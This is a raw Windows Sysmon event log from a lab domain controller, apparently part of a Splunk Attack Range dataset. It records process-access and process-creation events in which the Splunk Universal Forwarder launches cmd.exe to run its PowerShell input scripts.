09:20:22.787{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD6-6151-6C00-00000000FD01}3484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054242Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.787{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054241Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.787{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054240Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.787{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054239Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.787{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054238Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.787{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054237Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.787{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054236Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.787{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054235Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.787{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054234Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.787{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054233Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.787{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD6-6151-6C00-00000000FD01}3484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054232Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.787{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD6-6151-6C00-00000000FD01}3484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054231Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.790{5EBD8912-8CD6-6151-6C00-00000000FD01}3484C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054230Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.677{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD6-6151-6B00-00000000FD01}3512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054229Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.677{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054228Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.677{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054227Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.677{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054226Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.677{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054225Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.677{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054224Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.677{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054223Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.677{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054222Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.677{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054221Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.677{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054220Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.677{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD6-6151-6B00-00000000FD01}3512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054219Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.677{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD6-6151-6B00-00000000FD01}3512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054218Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.680{5EBD8912-8CD6-6151-6B00-00000000FD01}3512C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054217Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 